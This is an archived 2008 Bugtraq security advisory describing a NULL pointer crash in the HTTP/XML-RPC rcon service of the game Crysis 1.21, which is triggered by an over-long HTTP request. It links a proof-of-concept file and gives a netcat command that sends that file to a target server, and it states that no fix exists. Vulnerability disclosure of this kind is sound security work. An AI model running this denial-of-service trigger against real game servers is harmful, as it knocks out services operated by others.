bugtraq June 2008 archive
Main Archive Page > Month Archives  > bugtraq archives
bugtraq: NULL pointer in the HTTP/XML-RPC service of Crysis 1.21

NULL pointer in the HTTP/XML-RPC service of Crysis 1.21

From: Luigi Auriemma <aluigi_at_nospam>
Date: Mon Jun 16 2008 - 21:46:51 GMT
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk, packet@packetstormsecurity.org, cert@cert.org, news@securiteam.com

#######################################################################
Luigi Auriemma Application: Crysis http://www.ea.com/crysis/home.jsp Versions: <= 1.21 (1.1.1.6156 showed as gamever) Platforms: Windows Bug: NULL pointer in the HTTP/XML-RPC service Exploitation: remote, versus server Date: 16 Jun 2008 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org
#######################################################################
1) Introduction 2) Bug
3) The Code
4) Fix

#######################################################################


  1. Introduction

Crysis is a recent FPS game developed by Crytek (http://www.crytek.com) and released at November 2007.
This game is well known for being a "computer killer" due to its high hardware requirements but also for having various problems with cheaters.

#######################################################################



2) Bug

Crysis has a small internal HTTP/XML-RPC server which must be activated with the http_startserver command (manually or through server.cfg) and allows to receive rcon commands.

This service works on port 80 if no port is specified but usually the admins choose a custom port or just the same of the game (64087, the service is easily distinguishable due to the "Bad Request" title visible with a web browser).

If an attacker uses an HTTP request with a total length major than 4096 bytes the server will crash due to a NULL pointer.

#######################################################################



3) The Code

http://aluigi.org/poc/dontcrysis.txt

  nc SERVER HTTPPORT -v -v < dontcrysis.txt

#######################################################################



4) Fix

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org